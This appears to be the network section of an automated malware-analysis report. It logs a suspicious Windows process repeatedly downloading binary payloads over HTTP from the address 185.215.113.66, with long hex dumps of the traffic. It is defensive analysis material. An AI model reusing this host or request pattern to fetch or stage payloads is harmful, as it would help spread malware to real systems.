                                                                                                                                                                                                    Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147638083 CEST112INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                                    Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147654057 CEST1236INData Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a
                                                                                                                                                                                                    Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147708893 CEST1236INData Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9
                                                                                                                                                                                                    Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fO
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147726059 CEST1236INData Raw: 84 70 54 7d 76 a7 80 23 30 99 b6 5d 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e
                                                                                                                                                                                                    Data Ascii: pT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147757053 CEST1236INData Raw: 03 c4 8d f3 91 32 4d 71 23 2b b6 64 8c 4d 8f 93 31 e2 1e fb af 3b 6f 02 ab bb c8 79 d0 e2 41 b5 7a 6d ab 40 21 3c 82 19 45 fe 84 e5 c5 6e 6b 20 3f dd 13 d4 43 0a 1a bb b4 e1 3d 7c 39 50 9e c0 b5 a3 65 f5 7f 64 6e dd 19 47 0b 44 ba 46 25 a8 ea 9e
                                                                                                                                                                                                    Data Ascii: 2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%S\(L7QREU6=oNL |~;vF|5qOh[IO*9%i0q~3T|UJ
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147773981 CEST1236INData Raw: bc fd 46 1f 7d 2b 56 fb 1f 31 da 2a 91 f7 8b 70 30 52 04 b7 51 4f d7 19 01 ac eb e0 0b d3 7b 95 9d 6a 80 17 90 13 77 64 4c 08 fb 30 5f c9 18 32 94 7f 7d 0a 68 84 be 12 17 47 6e ef 5b 8d 3e 8a 1f fd c6 71 ec 12 3e 83 c4 07 a5 f2 61 fc 20 72 b4 c6
                                                                                                                                                                                                    Data Ascii: F}+V1*p0RQO{jwdL0_2}hGn[>q>a r{tVJ0sN]Q\-#6npc`DkoAs5.5>Zj7AB_+>0~$mN}_x&p;=alp >ix2U
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147792101 CEST1236INData Raw: dd 98 c7 0e 0b 44 0a 51 67 f5 ec 6f 5f df 37 7d dd 2d 83 03 9b a9 b6 29 ae 9e f6 b0 fd b1 bd a4 d2 69 26 4f db fd 06 25 5b d6 82 f2 00 ab c6 d8 b8 75 07 c3 96 7b a4 b8 7a 94 ed fc fe 68 c5 11 61 52 ec f4 0c 49 a3 4e cd f0 9e cd 39 3c 5b 43 f2 a5
                                                                                                                                                                                                    Data Ascii: DQgo_7}-)i&O%[u{zhaRIN9<[C&WK,+-27}#hH?FDr2Ey#sWZ+BC*}(WI)jzd*sqL0}lmF-pd2+raZm8zq,!~V0:eUI7"[
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147808075 CEST460INData Raw: 36 d3 ed 80 54 51 29 74 21 96 e1 de 29 a3 b4 e4 9c 7a 5b dd 63 b5 11 3d 46 9b e0 ab 86 52 cf 22 23 ba 7b 93 b1 27 71 cd c1 dd 64 98 28 be 09 3b 49 09 05 30 b9 14 7d 3c 8a 8e ac 86 1b 6c 23 89 eb 25 e9 c2 e7 9e 2f 30 80 b9 02 fd 3e 24 1c 4c 25 6a
                                                                                                                                                                                                    Data Ascii: 6TQ)t!)z[c=FR"#{'qd(;I0}<l#%/0>$L%j,6SpcqFjAc0%GhGci,gI\&<&sQpc,}KFz#;?:ee.D3<8>wI]0i}-F0Y`"


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    23192.168.2.854530185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:14.185146093 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.099911928 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:15 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 16128
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a973-3f00"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.099936008 CEST212INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                                    Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x\R')Z{iC,}'hCh5[wRG@XB;G[-iC+(
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.099961996 CEST1236INData Raw: 0e 3f b4 83 00 45 3d f0 b0 79 5b bf 09 d7 a1 81 c6 e5 24 02 ed fa 7f dc fb ff c0 0d 48 8d 65 26 cf 06 b2 71 73 96 2a b7 75 ce 6b 48 fb b9 37 3c 49 7a e4 48 36 3d 41 7a 71 09 6b 5d 39 ad e3 68 6c 67 3a e8 ab 6b 2e 8b 00 aa 76 14 16 05 4b 1d 34 e4
                                                                                                                                                                                                    Data Ascii: ?E=y[$He&qs*ukH7<IzH6=Azqk]9hlg:k.vK4"N[e:M;2/KUNMlRA8Wh!&J|-^=_4g_^o3W86!$iBOkNGPAX-(U8a|(
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.099984884 CEST1236INData Raw: a4 80 cb 28 af 42 52 19 d7 15 d0 63 41 ec ab 0e d7 45 cf ab 0e 79 33 fa ea f9 2e 28 64 7b 41 ff 1a 23 f4 d9 9c b8 a5 9d 2f 0d c6 fe ab 0e c9 ee d9 13 ce dc 68 f4 9b 1f 3e 90 1c 28 88 80 48 b0 b1 cb 79 b1 4e 7d bc 58 18 85 f5 32 6d 8b 2b 17 40 18
                                                                                                                                                                                                    Data Ascii: (BRcAEy3.(d{A#/h>(HyN}X2m+@0'+gU2OduQa17j(rEw3<&tLi)DVo|0<~CjZ1HVs1+q:_MvbHSw~h"DEH+{+
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.100003958 CEST1236INData Raw: f6 0d 42 d0 89 db 7a 8d 48 72 73 65 78 4a 4a e4 65 af 22 d2 92 e2 df 78 7f d1 e6 ca a4 02 d3 67 ac d9 2b c6 62 19 fb b8 2d 1e 26 b6 ff 96 d5 10 78 5b 8b d4 b1 6d 2c 56 08 8a d0 83 62 2f ba 57 55 c1 86 86 cd b3 ec 1e 45 65 1e 85 dc c0 74 8c 14 53
                                                                                                                                                                                                    Data Ascii: BzHrsexJJe"xg+b-&x[m,Vb/WUEetS~F/xhfo&Y.=yU9hwaL{%+_A1CvsDJrf?Z-\]?if;&(AHg+^M$^GGWRmMZuir&Z
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.100028992 CEST336INData Raw: ef 8c 5f 2b 3d e7 e1 12 79 a4 85 3f 01 f2 50 74 c6 b0 56 a0 81 c4 c6 4f 44 2f db 6d 83 da 85 c4 de da dc 70 ac 44 0c 14 56 51 09 2a 6a 6a 26 21 f9 e9 2d 36 4d bb a3 f8 61 3a 02 7c 47 15 a3 02 f8 40 ac 96 a3 9a 60 e3 52 0c 0c a1 f7 11 77 3c d4 07
                                                                                                                                                                                                    Data Ascii: _+=y?PtVOD/mpDVQ*jj&!-6Ma:|G@`Rw<,ywV#eeEVBAH/^Cpo#=S-s_b=Z@b(A>O>2#i%wt<2gQE>&HM,T>E0`D/ZSd|g=K/rz
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.100049973 CEST1236INData Raw: 20 97 a7 5a eb 68 70 6c ae 87 5e 79 68 1f 28 c1 db d4 71 4b 6f c7 14 49 cf c9 d5 aa 94 50 4e dd 49 5d 23 73 94 a3 e4 9e a4 22 26 64 e7 45 35 f0 86 69 f2 91 82 77 76 c5 4e f2 31 83 5c 00 7b 6d aa 0b 22 13 6a ea 2d f4 7d d9 b0 9c 89 d3 64 47 2b 40
                                                                                                                                                                                                    Data Ascii: Zhpl^yh(qKoIPNI]#s"&dE5iwvN1\{m"j-}dG+@7YJ!,zxa0B#dPI@$H1<X(aPpV_iB'mQRmidpA,fPLMw8.P0bWGOaY)(V+qka$bB+`47
                                                                                                                                                                                                    Oct 26, 2024 07:28:16.100070953 CEST212INData Raw: 5b 57 37 91 62 24 ce a0 ce 7b 53 db 58 82 90 54 88 62 5d 5f 93 27 ac 67 cd 01 f0 8e 1c 27 50 5e 90 34 12 c1 65 2d e5 d4 62 e9 a4 16 d9 6f d0 cf b3 31 99 45 ae ff d8 47 24 cc 9e 02 bd 53 ed 7d 94 76 6a 48 57 b3 ad 32 78 2c f4 67 70 0f 68 98 90 dd
                                                                                                                                                                                                    Data Ascii: [W7b${SXTb]_'g'P^4e-bo1EG$S}vjHW2x,gph- 88u'7:wc #?2UK7+jg}5GQPZV,I<fs*hPH_QpFULkX4d_P,m


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    24192.168.2.854551185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:18.656569004 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587805033 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:19 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 10496
                                                                                                                                                                                                    Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67154d18-2900"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587872028 CEST112INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                    Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587883949 CEST1236INData Raw: eb f7 e1 3e b0 c8 e9 ca 8d d4 e4 c0 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b
                                                                                                                                                                                                    Data Ascii: >*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587896109 CEST1236INData Raw: be 2f 61 3a 1b 4e 54 9f 16 74 9c d6 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc
                                                                                                                                                                                                    Data Ascii: /a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587909937 CEST1236INData Raw: 99 31 96 51 d2 49 8d 75 9f a1 b5 63 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c
                                                                                                                                                                                                    Data Ascii: 1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh[
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587923050 CEST336INData Raw: 93 05 8f 66 d7 1c 1e 74 35 55 8e 3e 31 a8 75 b5 61 82 75 bf 07 d4 ae 95 c4 56 90 7c cb 70 96 18 0f 8d 94 0d ed c5 38 19 fb 22 c5 0b 12 87 60 3b 81 03 12 75 54 3b 9d 5f 49 0f c9 02 17 62 6d e2 fe bb 70 70 d5 80 63 88 df db 26 ba b5 f0 ea 96 e1 99
                                                                                                                                                                                                    Data Ascii: ft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587939024 CEST1236INData Raw: aa fa 62 12 93 06 96 26 10 ad ee 3f 3a 32 0f 63 b0 c9 34 e0 c6 5d 26 60 69 44 af c5 91 85 d2 84 09 89 f2 6c 3d 84 bc 18 7a 15 34 45 a4 64 67 41 97 93 05 44 ff df 37 26 13 b8 c0 69 cd d0 4d e7 a8 07 3a c0 b4 91 f1 c8 d0 9a 5f ec 8d 18 a9 e0 47 12
                                                                                                                                                                                                    Data Ascii: b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&q"Ka4tO>]=7PpVra;AyN<.O~`=]/
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587950945 CEST212INData Raw: 55 fa f6 a6 80 b6 6c 83 d2 ea 2f d6 f9 a2 96 d2 ee 32 1d 3a 03 4f 21 69 97 4b 76 be d4 fd 5e 94 dc b6 91 f9 89 7f 6c da 9f c8 b4 c1 a7 bb 31 3d 07 3e 88 72 f1 4a fa 21 3b fb e2 1e 9e 3d 7f 77 4a 6f 8a 09 14 20 4f f5 68 09 fe f2 df 7a 11 bb 4f 3d
                                                                                                                                                                                                    Data Ascii: Ul/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKdPSmy"Y9o3QBqYV#V
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587963104 CEST1236INData Raw: 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6 f3 62 9e e0 19 5c 0f 68 6c 6a 7f 47 c7 6b 63 e5 d3 9b eb 79 15 a0 d6 c4 60 4c f7 0f 40 be 83 26 df ce 43 87 cd 37 57 7b
                                                                                                                                                                                                    Data Ascii: r8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r2.Q'mUJ1lt{-aY49<
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.587975025 CEST212INData Raw: f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10 d5 65 63 95 11 9a 93 94 ab 63 b4 0e 5a fd eb e5 bf ce 3f c0 6d 0d 5f 0a 8d f8 3d 55 86 56 9f f1 e1 fa 87 54 fb 9d 0b d8
                                                                                                                                                                                                    Data Ascii: oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[!nl
                                                                                                                                                                                                    Oct 26, 2024 07:28:19.593380928 CEST1236INData Raw: d2 49 6f 6e d2 84 b7 9e 42 0f 04 d2 31 6a 85 84 67 d0 f6 27 90 bc 81 d5 7c f5 5d 77 3c 98 02 9e f6 4f a1 f7 79 7f 99 12 fa 13 fe 66 47 f4 1e e8 7f 25 57 bb 83 6c 27 c3 08 58 32 87 63 20 5f 15 27 a0 76 5e 1c d0 b1 aa fe 5d 7f 58 74 f7 82 43 50 38
                                                                                                                                                                                                    Data Ascii: IonB1jg'|]w<OyfG%Wl'X2c _'v^]XtCP8&S*.OU@:`#45/`:JI]<KDZWdT6aMep>a<Wym+OdkXaKY;,SPXD@`7Geq NW(EK0s


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    25192.168.2.854568185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:21.907001019 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823431969 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:22 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 13568
                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67179628-3500"
                                                                                                                                                                                                    Accept-Ranges: bytes
